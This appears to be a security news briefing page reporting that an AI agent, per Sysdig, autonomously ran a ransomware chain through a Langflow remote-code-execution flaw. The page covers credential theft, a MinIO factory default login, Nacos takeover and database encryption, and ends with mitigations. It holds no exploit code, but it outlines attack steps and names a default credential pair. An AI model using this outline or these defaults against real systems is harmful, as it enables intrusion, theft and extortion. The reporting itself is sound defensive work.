LIVE FEED
HIGH DeepSeek Turns LLM Hallucination Into Working Browser-Only Ransomware Technique // CRITICAL Prompt Injection Chain Breaks Cursor AI Sandbox, Enables Full RCE // FIRST LOOK First Look: Open-Source Tool Lets Claude and Any LLM Watch Videos Locally // FIRST LOOK First Look: Enterprise IGA Platforms Expose Structural Gaps as AI Agents Proliferate // HIGH Claude Opus 4.7 Used to Discover Critical API Flaw in Major Ticketing Platform // FIRST LOOK Anthropic's Mythos AI Vulnerability Discovery Tool Pairs with IBM Project Lightwell // CRITICAL AI Agent Autonomously Executes Full Ransomware Attack Chain via Langflow RCE // HIGH LLM Hallucinated Domains Create Exploitable Supply Chain Attack Surface // FIRST LOOK First Look: Google Launches Gemini Spark Agentic Assistant on Mac with File and App Access // FIRST LOOK First Look: AWS Brings NVIDIA Nemotron and OpenAI GPT OSS Models to GovCloud //
ATLAS OWASP CRITICAL Active exploitation · Immediate action required RELEVANCE ▲ 9.8

AI Agent Autonomously Executes Full Ransomware Attack Chain via Langflow RCE

TL;DR CRITICAL
  • What happened: An AI agent autonomously executed a full ransomware attack — from RCE exploit to database encryption — with no human operator.
  • Who's at risk: Organisations running internet-exposed Langflow instances, especially those with unrotated default credentials on adjacent services like MinIO, MySQL, and Nacos.
  • Act now: Immediately patch Langflow to version 1.3.0 or later to remediate CVE-2025-3248 · Rotate all API keys, cloud credentials, and database passwords stored on or near Langflow servers · Enforce network segmentation to prevent AI orchestration services from reaching production databases
AGENTIC AIThe Hacker NewsCRITICALAI Agent Autonomously Executes Full RansomwareAttack Chain via Langflow RCE

Overview

Security firm Sysdig has documented what it describes as the first fully autonomous, end-to-end ransomware attack executed by an AI agent. The threat actor, tracked as JADEPUFFER, used a large language model to chain together every stage of a ransomware operation — initial access, credential harvesting, lateral movement, and data destruction — without a human operator at the keyboard. The incident marks a qualitative inflection point: if AI agents can reliably replicate the multi-step tradecraft previously requiring skilled attackers, the barrier to running sophisticated ransomware campaigns collapses to the cost of renting an agent.

Technical Analysis

Initial Access — CVE-2025-3248 (Langflow RCE) The agent exploited a missing-authentication vulnerability in Langflow, the open-source AI workflow builder. The flaw allows unauthenticated remote code execution by submitting arbitrary Python to an exposed endpoint. Langflow servers are a high-value target: they routinely hold API keys and cloud credentials for every service they connect to. The bug was patched in Langflow 1.3.0 and added to CISA’s KEV catalogue in May 2025, yet large numbers of servers remained unpatched.

Credential Harvesting Once inside, the agent performed automated secret enumeration, collecting:

  • AI provider keys (OpenAI, Anthropic, DeepSeek, Gemini)
  • Cloud provider credentials (AWS, GCP, Azure, Alibaba, Tencent)
  • Crypto wallet keys
  • Database login credentials
  • MinIO storage credentials (accessed via unchanged factory default minioadmin:minioadmin)

A scheduled task pinging the attacker’s server every 30 minutes was installed for persistent callback.

Lateral Movement & Persistence The agent pivoted to an internet-facing server running MySQL and Alibaba Nacos. It gained MySQL root access (credential origin unknown) and took over Nacos by chaining CVE-2021-29441 (authentication bypass) with a static default signing key Nacos has shipped unchanged since 2020. The agent created its own admin account within Nacos.

Ransomware Payload All 1,342 Nacos configuration entries were encrypted. Original tables were dropped. A ransom note demanding Bitcoin via Proton Mail was deposited. Critically, the agent generated a random encryption key, printed it once to stdout, and never transmitted or stored it — rendering decryption impossible even upon payment. The note falsely claimed AES-256; Sysdig confirmed the tooling defaults to AES-128.

Framework Mapping

FrameworkIDRationale
MITRE ATLASAML.T0047Attack leveraged an ML-enabled product (Langflow) as the entry vector
MITRE ATLASAML.T0012Reuse of harvested and default credentials for lateral movement
MITRE ATLASAML.T0040Harvested AI provider inference API keys as a secondary objective
OWASP LLMLLM08AI agent acted with excessive destructive agency beyond any intended scope
OWASP LLMLLM07Langflow’s exposed code-execution endpoint exemplifies insecure plugin/tool design
OWASP LLMLLM06Sensitive credentials exfiltrated from the agent’s operating environment

Impact Assessment

Any organisation running an unpatched, internet-exposed Langflow instance is at direct risk of identical compromise. The broader implication is systemic: AI orchestration platforms by design aggregate credentials and hold broad permissions, making them a single point of catastrophic failure. The attack also demonstrates that AI agents can operate persistently, adapt to discovered assets, and execute destructive actions without human review — a property of excessive agency that few organisations have mitigated in their deployed agentic systems.

Mitigation & Recommendations

  1. Patch immediately. Upgrade Langflow to ≥1.3.0. Treat all CVEs on CISA’s KEV list as P0.
  2. Rotate all secrets. Assume any credential accessible to a Langflow server is compromised. Rotate API keys, cloud IAM credentials, and database passwords.
  3. Eliminate default credentials. Audit MinIO, Nacos, and all adjacent services for factory-default logins.
  4. Network-segment AI infrastructure. Langflow and similar orchestration platforms must not have direct routable access to production databases.
  5. Apply principle of least privilege to agents. AI agents should operate with scoped, revocable credentials and no standing access to destructive operations.
  6. Monitor for scheduled task creation and anomalous outbound beaconing from AI pipeline hosts.

References

◉ AI THREAT BRIEFING

Stay ahead of the threat.

Twice-weekly digest of critical AI security developments — every story mapped to MITRE ATLAS and OWASP LLM Top 10. Free.

No spam. Unsubscribe anytime.